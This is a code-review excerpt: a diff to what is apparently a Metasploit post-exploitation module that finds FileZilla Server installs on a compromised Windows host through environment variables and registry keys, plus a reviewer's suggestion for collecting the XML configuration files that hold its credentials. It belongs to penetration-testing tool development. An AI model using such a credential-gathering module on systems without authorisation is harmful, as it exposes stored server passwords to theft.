modules/post/windows/gather/credentials/filezilla_server.rb

```diff
@@ -37,36 +37,60 @@ def run
       return
     end
 
-    @progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
+    progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432')
+    locations = []
+    progfiles_env.each do |k, v|
+      next if v.blank?
+      locations << v + "\\FileZilla Server\\"
+    end
+
+    begin
+      root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\FileZilla Server")
+      open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
+      locations << open_key.query_value("install_dir").data + "\\"
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
 
-    filezilla = check_filezilla
+    begin
+      root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server")
+      open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
+      locations << open_key.query_value("install_dir").data + "\\"
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
+
+
+    locations = locations.uniq
+    filezilla = check_filezilla(locations)
     get_filezilla_creds(filezilla) if filezilla
   end
 
 
-  def check_filezilla
+  def check_filezilla(locations)
     paths = []
-    path = @progs + "FileZilla Server\\"
-
-    print_status("Checking for Filezilla Server directory in: #{path}")
-
     begin
-      session.fs.dir.entries(path)
+      locations.each do |location|
+        print_status("Checking for Filezilla Server directory in: #{location}")
+        begin
+          session.fs.dir.foreach("#{location}") do |fdir|
```

Comment:
I feel like this could be simplified with something like:
```ruby
session.fs.dir.foreach(location) do |file_name|
  next if file_name != 'FileZilla Server.xml' && file_name != 'FileZilla Server Interface.xml'
  filepath = location + file_name
  print_status("Configuration file found: #{filepath}")
  paths << filepath
end